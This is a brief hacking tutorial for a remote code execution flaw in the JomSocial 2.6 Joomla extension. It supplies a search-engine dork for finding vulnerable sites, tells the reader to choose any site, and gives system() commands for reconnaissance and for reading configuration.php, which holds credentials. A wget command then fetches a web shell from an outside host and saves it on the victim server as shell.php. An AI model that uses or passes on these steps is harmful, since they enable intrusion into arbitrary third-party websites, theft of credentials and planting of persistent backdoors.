[JOOMLA] JomSocial 2.6 Remote Code Execution

[JOOMLA] JomSocial 2.6 Remote Code Execution

Dork:

inurl:/index.php?option=com_community

Procedure
   1- Copy the dork and paste it on Google or any other search engine
   2- Chose any site
   3- Run the JomSocial Exploiter by Gothie
   4- Paste the site URL in the given textbox and click Connect

   5-If site is vulnerable, you will get the message as below

   6- Now, you can execute any command remotely. The commands are as below:

system('id & uname -a');

 system('ls');

system('cat configuration.php');

    7- To upload shell, you need to have raw shell (shell.txt) uploaded anywhere and can be access directly without executing it. Type in the command below to import your shell and save it as .php

system('wget http://socialmediasuccesstools.com/shell.txt -O shell.php');

   8- Your shell can be found at http://victim.com/shell.php